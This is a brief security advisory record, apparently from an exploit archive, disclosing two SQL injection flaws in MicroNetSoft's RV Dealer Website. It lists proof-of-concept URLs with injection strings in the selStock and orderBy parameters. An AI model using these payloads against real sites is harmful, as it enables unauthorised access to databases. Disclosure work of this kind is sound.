MicroNetSoft RV Dealer Website SQL Injection

2010-11-30T00:00:00
ID PACKETSTORM:96201
Type packetstorm
Reporter Underground Stockholm
Modified 2010-11-30T00:00:00

Description

                                        
                                            `TITLE: MicroNetSoft RV Dealer Website Two SQL Injection Vulnerabilities  
PRODUCT: MicroNetSoft RV Dealer Website  
PRODUCT URL: http://www.micronetsoft.com/store/scripts/prodView.asp?idproduct=77  
RESEARCHERS: underground-stockholm.com  
RESEARCHERS URL: http://underground-stockholm.com/  
  
SQL INJECTION BUGS:  
  
http://[host]/[path]/search.asp?selStock=x%27%20union%20selecta  
http://[host]/[path]/showAlllistings.asp?orderBy=union  
  
`